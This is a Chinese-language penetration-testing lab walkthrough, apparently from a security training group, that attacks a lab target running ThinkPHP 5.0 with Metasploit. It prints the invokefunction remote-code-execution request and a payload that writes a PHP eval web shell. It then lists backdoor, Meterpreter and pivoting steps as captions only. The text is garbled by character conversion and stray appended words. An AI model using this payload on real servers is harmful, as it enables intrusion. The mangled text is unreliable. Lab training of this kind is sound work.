出品|MS08067實驗室(www.ms08067.com)php
本文做者:dch(Ms08067實驗室 SRSP TEAM小組成員)
web
Metasploit滲透流程sql
(1)經過msfconsole命令啓動Metasploit在這個過程當中,系統會主動加載數據庫,如圖2所示:shell
啓動Metasploit數據庫
(2)使用輔助模塊進行端口掃描,以下圖所示:編程
進行掃描安全
(3)尋找合適的漏洞利用模塊並使用,以下圖所示:微信
加載模塊網絡
(4)查看並修改參數,以下圖所示:app
修改參數
(5)利用漏洞 Exploi,以下圖所示:
漏洞利用
(1)目標地址 192.168. 222 130
(2)攻擊地址 192.168. 238.129
端口掃描
經過掃描能夠看到Target1發現開放了21(ftp)、22(ssh)、80(http )、111(RPC)、888 (http)、3306(Mysql)、8888(http)這些端口服務,且是一個Linux 的操做系統。
web界面
打開後發現它是ThinkPHP框架,版本是V5.0,這時候想到它存在一個
RCE(遠程命令執行)漏洞,先用POC(利用程序)測試一下
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
結果以下圖所示
進行漏洞測試
http://192.168.222.130/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > cmd.php
成功得到shell
查看系統信息
查看攻擊機IP
製做後門
msf設置監聽
上傳shell.elf後門文件
賦予777權限執行
得到meterpreter
查看可用網段
添加第二層路由
查看存活主機
出現第二層網址
設置代理
經過設置代理,進行下一步的內網滲透
https://www.anquanke.com/post/id/170649
微信聯繫方式:cos2606596924
知足如下要求都可嘗試
1.至少會一門編程語言
2.漏洞平臺上提交過漏洞超過20個
3.每個月一文章分享(考慮有些要上班)
轉載請聯繫做者並註明出處!
Ms08067安全實驗室專一於網絡安全知識的普及和培訓。團隊已出版《Web安全攻防:滲透測試實戰指南》,《內網安全攻防:滲透測試實戰指南》,《Python安全攻防:滲透測試實戰指南》,《Java代碼安全審計(入門篇)》等書籍。
團隊公衆號按期分享關於CTF靶場、內網滲透、APT方面技術乾貨,從零開始、以實戰落地爲主,致力於作一個實用的乾貨分享型公衆號。
官方網站:https://www.ms08067.com/
掃描下方二維碼加入實驗室VIP社區
加入後邀請加入內部VIP羣,內部微信羣永久有效!